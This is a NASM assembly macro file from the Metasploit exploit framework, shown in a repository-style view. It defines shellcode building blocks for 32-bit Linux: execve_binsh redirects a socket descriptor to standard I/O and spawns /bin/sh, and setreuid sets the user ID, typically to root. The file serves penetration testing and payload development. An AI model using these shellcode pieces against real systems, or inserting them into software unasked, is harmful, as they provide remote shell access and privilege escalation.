164 lines
2.5 KiB
NASM
164 lines
2.5 KiB
NASM
|
;;
|
||
|
;
|
||
|
; Name: generic
|
||
|
; Type: Macro Set
|
||
|
; Qualities: None
|
||
|
; Authors: skape <mmiller [at] hick.org>
|
||
|
; Version: $Revision: 1407 $
|
||
|
; License:
|
||
|
;
|
||
|
; This file is part of the Metasploit Exploit Framework
|
||
|
; and is subject to the same licenses and copyrights as
|
||
|
; the rest of this package.
|
||
|
;
|
||
|
; Description:
|
||
|
;
|
||
|
; This file provides a generic API of macros that can be used
|
||
|
; by payloads. No payloads are actually implemented within this
|
||
|
; file.
|
||
|
;
|
||
|
; Macro List:
|
||
|
;
|
||
|
; execve_binsh - Executes a command shell with flags
|
||
|
; setreuid - Set real/effective user id
|
||
|
;;
|
||
|
BITS 32
|
||
|
|
||
|
;;
|
||
|
; Define undefined assumptions
|
||
|
;;
|
||
|
%ifndef ASSUME_REG_EDX
|
||
|
%define ASSUME_REG_EDX -1
|
||
|
%endif
|
||
|
%ifndef ASSUME_REG_EAX
|
||
|
%define ASSUME_REG_EAX -1
|
||
|
%endif
|
||
|
|
||
|
;;
|
||
|
; Macro: execve_binsh
|
||
|
; Purpose: Execute a command shell with various options
|
||
|
; Arguments:
|
||
|
;
|
||
|
; Execution flags: Flags used for executing the command shell in a
|
||
|
; number of modes.
|
||
|
;
|
||
|
; EXECUTE_REDIRECT_IO => Redirects stdin/stdout/stderr to the fd
|
||
|
; passed in 'edi'.
|
||
|
; EXECUTE_DISABLE_READLINE => Disables readline support. This is
|
||
|
; needed for redirection to UDP sockets.
|
||
|
;;
|
||
|
%define EXECUTE_REDIRECT_IO 0x0001
|
||
|
%define EXECUTE_DISABLE_READLINE 0x0002
|
||
|
|
||
|
%macro execve_binsh 1
|
||
|
|
||
|
%if %1 & EXECUTE_REDIRECT_IO
|
||
|
|
||
|
dup:
|
||
|
%ifdef FD_REG_EBX
|
||
|
%else
|
||
|
mov ebx, edi
|
||
|
%endif
|
||
|
push byte 0x2
|
||
|
pop ecx
|
||
|
dup_loop:
|
||
|
%if ASSUME_REG_EAX == 0
|
||
|
mov al, 0x3f
|
||
|
%else
|
||
|
push byte 0x3f
|
||
|
pop eax
|
||
|
%endif
|
||
|
int 0x80
|
||
|
dec ecx
|
||
|
jns dup_loop
|
||
|
|
||
|
%endif
|
||
|
|
||
|
execve:
|
||
|
%if ASSUME_REG_EAX == 0
|
||
|
mov al, 0xb
|
||
|
%else
|
||
|
push byte 0xb
|
||
|
pop eax
|
||
|
%endif
|
||
|
%if ASSUME_REG_EDX == 0
|
||
|
%else
|
||
|
cdq
|
||
|
%endif
|
||
|
push edx
|
||
|
|
||
|
%if %1 & EXECUTE_DISABLE_READLINE
|
||
|
|
||
|
push word 0x692d
|
||
|
mov ecx, esp
|
||
|
push byte 0x67
|
||
|
push word 0x6e69
|
||
|
push dword 0x74696465
|
||
|
push dword 0x6f6e2d2d
|
||
|
mov edi, esp
|
||
|
push edx
|
||
|
push dword 0x68732f2f
|
||
|
push dword 0x6e69622f
|
||
|
|
||
|
%else
|
||
|
|
||
|
push dword 0x68732f2f
|
||
|
push dword 0x6e69622f
|
||
|
|
||
|
%endif
|
||
|
|
||
|
mov ebx, esp
|
||
|
push edx
|
||
|
|
||
|
%if %1 & EXECUTE_DISABLE_READLINE
|
||
|
|
||
|
push ecx
|
||
|
push edi
|
||
|
|
||
|
%endif
|
||
|
|
||
|
push ebx
|
||
|
mov ecx, esp
|
||
|
int 0x80
|
||
|
|
||
|
%endmacro
|
||
|
|
||
|
;;
|
||
|
; Macro: setreuid
|
||
|
; Purpose: Set effective user id
|
||
|
; Arguments:
|
||
|
;
|
||
|
; User ID: The user identifier to setreuid to, typically 0.
|
||
|
;;
|
||
|
|
||
|
%macro setreuid 1
|
||
|
|
||
|
setreuid:
|
||
|
|
||
|
%if %1 == 0
|
||
|
|
||
|
xor ecx, ecx
|
||
|
|
||
|
%else
|
||
|
|
||
|
%if %1 < 256
|
||
|
|
||
|
push byte %1
|
||
|
|
||
|
%else
|
||
|
|
||
|
push dword %1
|
||
|
|
||
|
%endif
|
||
|
|
||
|
pop ecx
|
||
|
|
||
|
%endif
|
||
|
|
||
|
mov ebx, ecx
|
||
|
push byte 0x46
|
||
|
pop eax
|
||
|
int 0x80
|
||
|
|
||
|
%endmacro
|